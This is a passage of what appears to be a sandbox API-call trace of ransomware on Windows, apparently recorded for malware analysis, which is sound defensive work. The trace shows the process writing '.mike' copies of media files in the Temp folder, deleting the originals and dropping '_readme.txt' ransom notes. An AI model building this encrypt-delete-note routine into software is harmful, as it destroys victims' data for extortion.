HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.613] WriteFile (in: hFile=0x280, lpBuffer=0x2288d4c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x2288d4c*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0145.615] CloseHandle (hObject=0x280) returned 1 [0145.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log", lpFilePart=0x0) returned 0x3d [0145.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0145.616] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.616] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", lpFilePart=0x0) returned 0x43 [0145.616] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.617] WriteFile (in: hFile=0x280, lpBuffer=0x228fcb8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x228fcb8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0145.618] CloseHandle (hObject=0x280) returned 1 [0145.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.620] WriteFile (in: hFile=0x280, lpBuffer=0x22a0d94*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22a0d94*, lpNumberOfBytesWritten=0x2af074*=0x10, lpOverlapped=0x0) returned 1 [0145.621] CloseHandle (hObject=0x280) returned 1 [0145.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.622] WriteFile (in: hFile=0x280, lpBuffer=0x22a3fc4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22a3fc4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0145.622] CloseHandle (hObject=0x280) returned 1 [0145.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", lpFilePart=0x0) returned 0x43 [0145.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.623] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3.mike", lpFilePart=0x0) returned 0x48 [0145.623] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", dwFileAttributes=0x80) returned 1 [0145.623] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", lpFilePart=0x0) returned 0x43 [0145.623] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\edjwdvm7 z3z2t.mp3")) returned 1 [0145.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\edJWDvM7 Z3z2t.mp3", lpFilePart=0x0) returned 0x43 [0145.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0145.625] WriteFile (in: hFile=0x280, lpBuffer=0x22a731c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x22a731c*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0145.626] CloseHandle (hObject=0x280) returned 1 [0145.626] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eRJpK.mkv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eRJpK.mkv", lpFilePart=0x0) returned 0x3a [0145.627] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0145.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", lpFilePart=0x0) returned 0x42 [0145.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.628] WriteFile (in: hFile=0x280, lpBuffer=0x22ac398*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22ac398*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0145.629] CloseHandle (hObject=0x280) returned 1 [0145.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.635] WriteFile (in: hFile=0x280, lpBuffer=0x22d9228*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22d9228*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0145.635] CloseHandle (hObject=0x280) returned 1 [0145.635] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", lpFilePart=0x0) returned 0x42 [0145.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav.mike", lpFilePart=0x0) returned 0x47 [0145.636] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", dwFileAttributes=0x80) returned 1 [0145.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", lpFilePart=0x0) returned 0x42 [0145.636] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fgeypihm1dml4.wav")) returned 1 [0145.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\fgEYPIHM1Dml4.wav", lpFilePart=0x0) returned 0x42 [0145.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0145.639] WriteFile (in: hFile=0x280, lpBuffer=0x22dc570*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x22dc570*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0145.640] CloseHandle (hObject=0x280) returned 1 [0145.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", lpFilePart=0x0) returned 0x47 [0145.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", lpFilePart=0x0) returned 0x47 [0145.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", lpFilePart=0x0) returned 0x47 [0145.643] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0145.643] CreatePipe (in: hReadPipe=0x2af01c, hWritePipe=0x2af018, lpPipeAttributes=0x2aef9c, nSize=0x0 | out: hReadPipe=0x2af01c*=0x280, hWritePipe=0x2af018*=0x264) returned 1 [0145.644] GetCurrentProcess () returned 0xffffffff [0145.644] GetCurrentProcess () returned 0xffffffff [0145.644] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2af020, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2af020*=0x1d0) returned 1 [0145.644] CreatePipe (in: hReadPipe=0x2af01c, hWritePipe=0x2af018, lpPipeAttributes=0x2aef9c, nSize=0x0 | out: hReadPipe=0x2af01c*=0x280, hWritePipe=0x2af018*=0x284) returned 1 [0145.645] CoTaskMemAlloc (cb=0x20e) returned 0x4e1c10 [0145.645] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4e1c10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0145.645] CoTaskMemFree (pv=0x4e1c10) [0145.654] CloseHandle (hObject=0x264) returned 1 [0146.895] CloseHandle (hObject=0x1d0) returned 1 [0147.158] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.159] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", lpFilePart=0x0) returned 0x48 [0147.161] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3", lpFilePart=0x0) returned 0x43 [0147.162] WriteFile (in: hFile=0x278, lpBuffer=0x2302884*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2302884*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", lpFilePart=0x0) returned 0x48 [0147.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0147.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0147.187] WriteFile (in: hFile=0x1d4, lpBuffer=0x2114160*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2114160*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.188] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", lpFilePart=0x0) returned 0x48 [0147.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3.mike", lpFilePart=0x0) returned 0x48 [0147.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.190] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MksLa0m41b7UvH.mp3", dwFileAttributes=0x80) returned 1 [0147.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0147.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0147.194] WriteFile (in: hFile=0x1d4, lpBuffer=0x21174b8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x21174b8*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0147.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0147.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0147.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav", lpFilePart=0x0) returned 0x41 [0147.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0147.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0147.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.200] WriteFile (in: hFile=0x1d4, lpBuffer=0x211a370*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x211a370*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0147.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0147.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.205] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.207] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.210] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.212] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mXervh37EMC5.wav.mike", lpFilePart=0x0) returned 0x46 [0147.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.215] SetThreadErrorMode 